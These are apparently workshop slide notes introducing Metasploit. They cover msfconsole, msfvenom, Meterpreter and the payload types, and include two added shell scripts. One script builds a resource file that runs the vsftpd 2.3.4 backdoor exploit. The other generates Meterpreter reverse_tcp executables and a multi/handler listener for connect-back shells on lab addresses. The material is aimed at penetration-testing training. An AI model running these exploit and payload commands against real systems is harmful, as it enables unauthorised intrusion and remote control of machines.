Metasploit
What is Metasploit?
- Offensive security automation tool
- the Framework is fully open source (BSD licence); Rapid7 also sells a commercial Metasploit Pro built on top of it
- exploit modules are reviewed before they are merged and carry a reliability ranking (Excellent down to Manual), so you can tell how likely a module is to work or to crash the target
- roughly the same age as Aaron and Max
- targeted towards red teamers/pentesters
Pitfalls
- limited real-world utility against hardened or patched targets: its public modules and payloads are well known and heavily signatured by AV/EDR
- bad reputation due to abuse by script kiddies
- mostly written in Ruby
- it can be quite slow: msfconsole has to load thousands of modules at startup
How it can be useful
- as part of pentests that are partly or fully automated
- when driven from scripts: resource (.rc) files, or the msfrpcd RPC interface via libraries such as Pymetasploit3
- particularly useful for remote code execution bugs that are widely exploitable, where a tested module saves you rewriting the exploit yourself
How it works
- a git repo of Ruby modules (plus a few external Python and Go modules) organised into folders by type: exploits, auxiliary, post, payloads, encoders, nops, evasion
- pick a module, set a few options interactively (target host, payload, listener address) and then run it
Prerequisite: “The Terminal”
- NOT scary
- NOT complicated
- NOT all the same
The Terminal | T'Internet
---|---
terminal prompt | website
terminal emulator | web browser
Just as you move between websites inside one browser, you can move between different prompts (bash, PowerShell, msfconsole ...) inside one terminal emulator
Demo
Examples of prompts
- Bash
- PowerShell
- Python IDLE
- CMD
Metasploit commands
There are many, but the tools and terms you will probably need today are:
msfconsole
The main interactive console: search for modules, set their options, run exploits and manage the resulting sessions.
msfvenom
A tool for generating (and encoding) standalone payloads, e.g. an executable that connects back to a Metasploit listener.
Meterpreter
A payload that runs in memory on the compromised system and gives you a remote control channel over it.
AKA a fancy remote shell: file upload/download, screenshots, pivoting and privilege-escalation helpers on top of a plain command shell. It is not bash, which is why it works the same way on Windows and Linux targets.
Example usage
Finding exploits
Running an exploit
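Putting the "find it, set a few options, run it" workflow into a replayable form, as an added example that is not part of the original slides: the function below writes an msfconsole resource (.rc) script, which msfconsole executes line by line with `msfconsole -q -r file.rc`. The module path, target address and payload used as sample input (the classic vsftpd 2.3.4 backdoor module against an assumed lab host) are assumptions; swap in whatever `search` turns up for your target.

```sh
#!/bin/sh
# Added example (not from the original slides): emit an msfconsole
# resource script that replays search -> use -> set -> check -> run.
# Usage: build_rc MODULE RHOSTS PAYLOAD [LHOST]
build_rc() {
    module=$1
    rhosts=$2
    payload=$3
    lhost=${4:-}
    # Search first so the console shows the module next to its ranking
    # and any sibling modules before committing to it.
    printf 'search type:exploit name:%s\n' "${module##*/}"
    printf 'use %s\n' "$module"
    printf 'set RHOSTS %s\n' "$rhosts"
    printf 'set PAYLOAD %s\n' "$payload"
    # Only reverse (connect-back) payloads need the listener address.
    if [ -n "$lhost" ]; then
        printf 'set LHOST %s\n' "$lhost"
    fi
    printf 'show options\n'
    # `check` asks the module whether the target looks vulnerable without
    # firing the exploit; modules that cannot tell will say so.
    printf 'check\n'
    # -z: run the exploit but do not drop straight into the session.
    printf 'run -z\n'
    printf 'sessions -l\n'
}

# Sample input (assumed lab target, constructed for this example).
MODULE=${MODULE:-exploit/unix/ftp/vsftpd_234_backdoor}
RHOSTS=${RHOSTS:-192.168.56.101}
PAYLOAD=${PAYLOAD:-cmd/unix/interact}
RCFILE=${RCFILE:-${TMPDIR:-/tmp}/lab.rc}

build_rc "$MODULE" "$RHOSTS" "$PAYLOAD" "${LHOST:-}" > "$RCFILE"
cat "$RCFILE"

# Only launch Metasploit when explicitly asked (RUN_MSF=1), so the script
# can be inspected on a machine that does not have it installed.
if [ "${RUN_MSF:-0}" = 1 ]; then
    msfconsole -q -r "$RCFILE"
fi
```

Run it once without RUN_MSF to eyeball the generated .rc, then with `RUN_MSF=1` on the attacking box. For a connect-back payload (e.g. a Meterpreter reverse_tcp) pass `LHOST=<your ip>` as well; the vsftpd backdoor is a bind-style payload, so it needs no LHOST.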
Payloads
- Single (stageless) - A self-contained payload that does its whole job in one step, e.g. windows/meterpreter_reverse_tcp or windows/adduser. Larger, but there is no second download to go wrong.
- Stage - The larger part of a multi-stage payload (e.g. Meterpreter itself) that is delivered over the connection the stager set up; it never has to fit in the exploit's size budget.
- Stager - The small first part of a multi-stage payload that only establishes the communication channel (reverse_tcp, bind_tcp, reverse_https ...) and then pulls the stage over it.
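To make the staged/stageless distinction concrete, here is an added example (not from the original slides) that pairs each form of a Meterpreter payload with the msfvenom command that builds it and the multi/handler listener that must catch it. Addresses, ports and file names are assumptions for a lab; the classifier relies on Metasploit's naming convention (`meterpreter/reverse_tcp` = stager + stage, `meterpreter_reverse_tcp` = single) and reports `unknown` for anything it does not recognise rather than guessing.

```sh
#!/bin/sh
# Added example (not from the original slides): staged vs stageless
# payloads and the handler each one needs.

# Classify a payload name by Metasploit's naming convention:
#   <platform>/meterpreter/reverse_tcp  -> staged   (stager + stage)
#   <platform>/meterpreter_reverse_tcp  -> stageless (single)
# Anything else is reported as unknown; `msfvenom --list payloads` is the
# authoritative source, this is only a reading aid.
payload_kind() {
    case $1 in
        */meterpreter/*|*/shell/*|*/vncinject/*) echo staged ;;
        */meterpreter_*|*/shell_*) echo stageless ;;
        *) echo unknown ;;
    esac
}

# venom_cmd PAYLOAD LHOST LPORT FORMAT OUTFILE
# The msfvenom line that builds the connect-back binary. For a staged
# payload the file holds only the stager (a few hundred bytes of
# connect-back code); for a stageless one it holds all of Meterpreter.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$4" "$5"
}

# handler_rc PAYLOAD LHOST LPORT
# Resource script for the listener. PAYLOAD must be the exact string given
# to msfvenom: a stager expects the handler to send it the stage, a
# stageless binary expects to speak Meterpreter immediately, and mixing
# the two leaves you with a connection that never becomes a usable session.
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$1"
    printf 'set LHOST %s\n' "$2"
    printf 'set LPORT %s\n' "$3"
    # Keep listening after the first session so several hosts can call in.
    printf 'set ExitOnSession false\n'
    # -j: run as a background job; -z: do not auto-interact with sessions.
    printf 'exploit -j -z\n'
}

# Sample input (constructed, assumed lab listener address and port).
LHOST=${LHOST:-192.168.56.1}
LPORT=${LPORT:-4444}
for p in windows/x64/meterpreter/reverse_tcp windows/x64/meterpreter_reverse_tcp; do
    kind=$(payload_kind "$p")
    echo "# $p is $kind"
    venom_cmd "$p" "$LHOST" "$LPORT" exe "payload_$kind.exe"
    handler_rc "$p" "$LHOST" "$LPORT"
    echo
done
```

Save the handler lines to a file and start the listener with `msfconsole -q -r handler.rc` before running the generated executable on the target; compare the sizes of the two .exe files to see how much of the payload the stager leaves for the handler to deliver.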
Summary
Metasploit is a useful tool for learning how to exploit vulnerable machines and for automating parts of a pentest.